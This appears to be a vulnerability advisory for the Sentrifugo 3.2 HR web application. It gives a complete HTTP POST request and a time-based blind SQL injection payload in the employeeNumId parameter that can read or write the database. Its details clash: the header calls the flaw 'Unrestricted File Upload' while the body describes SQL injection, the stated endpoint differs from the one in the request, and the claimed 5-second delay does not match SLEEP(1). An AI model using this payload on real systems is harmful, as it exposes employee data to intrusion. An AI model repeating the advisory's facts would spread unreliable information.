Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2
Vulnerability: Unrestricted File Upload
CVE: CVE-2020-26805
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs… Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference: https://sourceforge.net/projects/sentrifugo/
Vulnerability Description:
In Sentrifugo web application, admin can edit employee’s informations via this endpoint —> sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, employeeNumId parameter is affected by SQLi vulnerability. Attacker can inject SQL commands into query, read data from database or write data into the database. If you send the below request, you will get the response approximately 5 seconds after because of the SLEEP command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /sentrifugo/index.php/employee/edit/id/2 HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 421
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/sentrifugo/index.php/employee/edit/id/2
Cookie: PHPSESSID=4p9aptkj3tg0kp675mtaf9d02v
Upgrade-Insecure-Requests: 1
tmp_emp_name=&act_inact=0&id=2&user_id=2&final_emp_id=EMPP1&id=2&user_id=2&employeeId=EMPP&employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ&prefix_id=&firstname=adas&lastname=asdasd&hid_modeofentry=Direct&disp_requi=&emprole=2&emailaddress=asdasd%40tasd.com&jobtitle_id=&position_id=&date_of_joining=2020%2F10%2F13&years_exp=&office_number=&extension_number=&office_faxnumber=&submit=Update
Payload,
1
employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ